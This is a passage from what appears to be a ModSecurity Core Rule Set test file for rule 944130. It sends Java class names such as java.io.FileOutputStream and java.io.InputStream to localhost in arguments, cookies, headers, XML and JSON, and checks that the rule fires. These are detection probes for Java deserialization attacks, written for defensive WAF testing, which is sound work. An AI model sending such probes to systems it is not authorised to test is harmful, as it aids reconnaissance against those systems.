"127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FileOutputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-109 - desc: "Content-Type application/json arg name includes keyword java.io.FileOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.FileOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-110 - desc: "Argument test includes keyword java.io.FilterInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-111 - desc: "Argument name includes keyword java.io.FilterInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FilterInputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-112 - desc: "Cookie test includes keyword java.io.FilterInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FilterInputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-113 - desc: "Cookie name includes keyword java.io.FilterInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FilterInputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-114 - desc: "Request header test includes keyword java.io.FilterInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FilterInputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-115 - desc: "XML attribute value includes keyword java.io.FilterInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-116 - desc: "XML element value includes keyword java.io.FilterInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-117 - desc: "Nested XML element value includes keyword java.io.FilterInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-118 - desc: "Content-Type text/plain includes keyword java.io.FilterInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-119 - desc: "Content-Type application/json arg value includes keyword java.io.FilterInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FilterInputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-120 - desc: "Content-Type application/json arg name includes keyword java.io.FilterInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.FilterInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-121 - desc: "Argument test includes keyword java.io.FilterOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-122 - desc: "Argument name includes keyword java.io.FilterOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FilterOutputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-123 - desc: "Cookie test includes keyword java.io.FilterOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FilterOutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-124 - desc: "Cookie name includes keyword java.io.FilterOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FilterOutputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-125 - desc: "Request header test includes keyword java.io.FilterOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FilterOutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-126 - desc: "XML attribute value includes keyword java.io.FilterOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-127 - desc: "XML element value includes keyword java.io.FilterOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-128 - desc: "Nested XML element value includes keyword java.io.FilterOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-129 - desc: "Content-Type text/plain includes keyword java.io.FilterOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-130 - desc: "Content-Type application/json arg value includes keyword java.io.FilterOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FilterOutputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-131 - desc: "Content-Type application/json arg name includes keyword java.io.FilterOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.FilterOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-132 - desc: "Argument test includes keyword java.io.FilterReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-133 - desc: "Argument name includes keyword java.io.FilterReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FilterReader=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-134 - desc: "Cookie test includes keyword java.io.FilterReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FilterReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-135 - desc: "Cookie name includes keyword java.io.FilterReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FilterReader=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-136 - desc: "Request header test includes keyword java.io.FilterReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FilterReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-137 - desc: "XML attribute value includes keyword java.io.FilterReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-138 - desc: "XML element value includes keyword java.io.FilterReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-139 - desc: "Nested XML element value includes keyword java.io.FilterReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-140 - desc: "Content-Type text/plain includes keyword java.io.FilterReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-141 - desc: "Content-Type application/json arg value includes keyword java.io.FilterReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FilterReader\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-142 - desc: "Content-Type application/json arg name includes keyword java.io.FilterReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.FilterReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-143 - desc: "Argument test includes keyword java.io.InputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.InputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-144 - desc: "Argument name includes keyword java.io.InputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.InputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-145 - desc: "Cookie test includes keyword java.io.InputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.InputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-146 - desc: "Cookie name includes keyword java.io.InputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.InputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-147 - desc: "Request header test includes keyword java.io.InputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.InputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-148 - desc: "XML attribute value includes keyword java.io.InputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-149 - desc: "XML element value includes keyword java.io.InputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.InputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-150 - desc: "Nested XML element value includes keyword java.io.InputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.InputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-151 - desc: "Content-Type text/plain includes keyword java.io.InputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.InputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-152 - desc: "Content-Type application/json arg value includes keyword java.io.InputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.InputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-153 - desc: "Content-Type application/json arg name includes keyword java.io.InputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.InputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-154 - desc: "Argument test 